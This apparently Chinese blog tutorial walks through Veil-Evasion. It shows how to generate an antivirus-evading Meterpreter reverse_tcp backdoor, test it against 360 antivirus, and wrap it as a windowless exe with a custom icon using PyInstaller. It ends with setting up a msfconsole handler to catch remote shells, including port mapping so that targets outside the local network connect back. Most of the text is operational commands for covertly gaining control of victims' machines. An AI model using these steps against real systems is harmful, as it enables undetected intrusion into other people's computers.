简介
Veil-Evasion是一个用python写的流行的框架。我们可以用这个框架生成能够规避大多数杀软的载荷。Veil-Evasion被原生设计为在kali上,但其实存在python环境的系统上应该都能运行。
你可以用命令行轻松调用Veil-Evasion,按菜单选项生成payload。在创建payload的时候,Veil-Evasion会询问你是否想把payload文件用Pyinstaller或者Py2Exe转为可执行文件。
安装
下载
- 官网:https://www.veil-framework.com/
- github项目地址:https://github.com/Veil-Framework/Veil-Evasion
安装
kali linux可以直接
1
|
apt–get install veil–evasion
|
git克隆安装:
1
2
3
|
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil–Evasion/setup
./install–addons.sh
|
视频介绍
使用
payload列表
使用use、list可以列出当前可用的模块
简单实例
我们利用这个payload
1
|
6) c/meterpreter/rev_tcp
|
这里,我们输入命令:
1
|
use 6
|
或者
1
|
use c/meterpreter/rev_tcp
|
我们只需配置一下options就可以了,包括监听地址,端口,是否生成exe
这里,我们仅配置一下地址,然后run/generate(生成):
1
2
|
set LHOST 192.168.1.114
generate
|
payload路径:
测试360查杀:
设置监听:
当payload在目标机器运行后,获得session:
Python脚本生成exe
这个过程实际上是生成了一个python脚本,我们可以通过pyinstaller将其转化问exe文件
下面简单讲一下将python脚本生成为exe文件的过程
pyinstaller安装
下载pyinstaller并解压(可以去官网下载最新版):
http://nchc.dl.sourceforge.net/project/pyinstaller/2.0/pyinstaller-2.0.zip
安装最新版本的 pywin32-217.win32-py2.7.exe:
http://download.csdn.net/detail/gfsfg8545/6539111
不然会出现如下错误
1
|
Error: PyInstaller for Python 2.6+ on Windows needs pywin32.
|
具体安装过程可以参考这篇博文:
http://blog.csdn.net/hmy1106/article/details/45151409
一般的命令:(cmd进入到pyinstaller的文件夹)
1
2
|
python pyinstaller.py –w –onefile xxx.py(你想转换的py脚本)
python pyinstaller.py –w –onefile –icon=”my.ico” xxx.py
|
关于图标的设置问题:应该准备四张不同尺寸(具体尺寸参靠:stackoverflow的png文件,然后用png2icon(下载)脚本把它们合成一张icon图标文件
msf的设置以及veil-evasion的设置
这里分两种情况:
1.内网连接后门
内网比较简单, veil-evasion里选定模之后,可以指定LHOST就是你的计算机在内网的ip,然后受控端也在内网,可以直接到:
1
|
/var/lib/veil–evasion/output/handlers/
|
这个目录下找到相应的msf脚本,然后执行
1
|
msfconsole –r “veil生成的msf脚本文件”
|
然后等待目标运行后门就可以了。
2.外网链接后门
这个就需要进行端口映射,我这里使用了花生壳作为外网端口映射的工具,花生壳的具体操作过程不再赘述。
veil-evasion生成payload的时候,LHOST要设置成你在花生壳上申请的域名(也可以设置从域名指向的ip),LPORT要设置成花生壳分配的那个端口号
花生壳设置的时候,外网域名指向你本机内网的ip地址,和你自己设定的映射端口号。
msf监听
- 开启msf
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- – set LHOST 你本机内网的ip地 ,set LPORT 你本地监听的端口
- explit
参考
未经允许